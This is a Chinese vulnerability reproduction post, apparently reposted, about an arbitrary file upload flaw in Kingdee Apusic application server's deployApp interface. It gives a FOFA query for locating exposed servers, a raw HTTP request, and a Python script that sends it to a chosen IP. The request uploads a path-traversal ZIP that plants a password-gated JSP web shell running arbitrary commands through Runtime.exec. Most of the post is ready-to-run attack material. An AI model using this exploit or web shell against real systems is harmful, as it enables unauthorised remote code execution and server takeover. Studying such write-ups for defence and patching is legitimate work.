【漏洞介绍】金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC]

2023年12月21日09:39:07评论90 views字数 4802阅读16分0秒阅读模式

金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC]

1. 产品介绍

金蝶 Apusic 是金蝶集团旗下的一款企业级应用服务器，专为企业提供可靠、高性能的应用运行环境。Apusic 支持 Java、.NET、Node.js 等多种开发语言和技术，可以用于构建各种企业级应用，如企业资源计划 (ERP) 系统、客户关系管理 (CRM) 系统、供应链管理系统等。

2.漏洞描述

金蝶 Apusic 应用服务器存在一个任意文件上传漏洞，攻击者可以通过构造恶意请求上传恶意文件到服务器，导致远程代码执行，危及服务器安全。

【漏洞介绍】金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC]

3.fofa查询语句

app="Apusic应用服务器"

4.漏洞复现

POC

POST /admin//protect/application/deployApp HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryd9acIBdVuqKWDJbdAccept-Encoding: gzip ------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="appName" 111------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="deployInServer" false------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="clientFile"; filename="evil.zip"Content-Type: application/x-zip-compressed {{unquote("PKx03x04x14x00x00x00x00x00xe5yx09Ukx0axc8xe7dx01x00x00dx01x00x007x00x00x00../../../../applications/default/public_html/shell2.jsp<%x0dx0a    if x28"admin".equalsx28request.getParameterx28"pwd"x29x29x29 x7bx0dx0a        java.io.InputStream input = Runtime.getRuntimex28x29.execx28request.getParameterx28"cmd"x29x29.getInputStreamx28x29;x0dx0a        int len = -1;x0dx0a        byte[] bytes = new byte[4092];x0dx0a        while x28x28len = input.readx28bytesx29x29 != -1x29 x7bx0dx0a            out.printlnx28new Stringx28bytes, "GBK"x29x29;x0dx0a        x7dx0dx0a    x7dx0dx0a%>PKx01x02x14x03x14x00x00x00x00x00xe5yx09Ukx0axc8xe7dx01x00x00dx01x00x007x00x00x00x00x00x00x00x00x00x00x00xb4x81x00x00x00x00../../../../applications/default/public_html/shell2.jspPKx05x06x00x00x00x00x01x00x01x00ex00x00x00xb9x01x00x00x00x00")}}------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="archivePath"  ------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="baseContext"  ------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="startType" auto------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="loadon"  ------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="virtualHost"  ------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="allowHosts"  ------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="denyHosts"  ------WebKitFormBoundaryd9acIBdVuqKWDJbd--

python检测脚本

import requests def verify(ip):    url = f'{ip}/admin//protect/application/deployApp'     headers = {        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15',        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryd9acIBdVuqKWDJbd',        'Accept - Encoding': 'gzip'    }     payload = '''    ------WebKitFormBoundaryd9acIBdVuqKWDJbd    Content-Disposition: form-data; name="appName"             111    ------WebKitFormBoundaryd9acIBdVuqKWDJbd    Content-Disposition: form-data; name="deployInServer"             false    ------WebKitFormBoundaryd9acIBdVuqKWDJbd    Content-Disposition: form-data; name="clientFile"; filename="evil.zip"    Content-Type: application/x-zip-compressed             {{unquote("PKx03x04x14x00x00x00x00x00xe5yx09Ukx0axc8xe7dx01x00x00dx01x00x007x00x00x00../../../../applications/default/public_html/shell2.jsp<%x0dx0a    if x28"admin".equalsx28request.getParameterx28"pwd"x29x29x29 x7bx0dx0a        java.io.InputStream input = Runtime.getRuntimex28x29.execx28request.getParameterx28"cmd"x29x29.getInputStreamx28x29;x0dx0a        int len = -1;x0dx0a        byte[] bytes = new byte[4092];x0dx0a        while x28x28len = input.readx28bytesx29x29 != -1x29 x7bx0dx0a            out.printlnx28new Stringx28bytes, "GBK"x29x29;x0dx0a        x7dx0dx0a    x7dx0dx0a%>PKx01x02x14x03x14x00x00x00x00x00xe5yx09Ukx0axc8xe7dx01x00x00dx01x00x007x00x00x00x00x00x00x00x00x00x00x00xb4x81x00x00x00x00../../../../applications/default/public_html/shell2.jspPKx05x06x00x00x00x00x01x00x01x00ex00x00x00xb9x01x00x00x00x00")}}    ------WebKitFormBoundaryd9acIBdVuqKWDJbd    Content-Disposition: form-data; name="archivePath"             ------WebKitFormBoundaryd9acIBdVuqKWDJbd    Content-Disposition: form-data; name="baseContext"               ------WebKitFormBoundaryd9acIBdVuqKWDJbd    Content-Disposition: form-data; name="startType"             auto    ------WebKitFormBoundaryd9acIBdVuqKWDJbd    Content-Disposition: form-data; name="loadon"        ------WebKitFormBoundaryd9acIBdVuqKWDJbd    Content-Disposition: form-data; name="virtualHost"               ------WebKitFormBoundaryd9acIBdVuqKWDJbd    Content-Disposition: form-data; name="allowHosts"         ------WebKitFormBoundaryd9acIBdVuqKWDJbd    Content-Disposition: form-data; name="denyHosts"          ------WebKitFormBoundaryd9acIBdVuqKWDJbd--    '''     try:        response = requests.post(url, headers=headers, data=payload)        # 验证成功输出相关信息        if response.status_code == 200:            print(f"{ip}存在金蝶 Apusic 应用服务器任意文件上传漏洞！！！")    except Exception as e:        pass if __name__ == '__main__':    self = input('请输入目标主机IP地址：')    verify(self)

————————————————

原文链接：

https://blog.csdn.net/qq_56698744/article/details/134872024

原文始发于微信公众号（利刃信安攻防实验室）：【漏洞介绍】金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC]

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞介绍】金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC]

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论

在线咨询

微信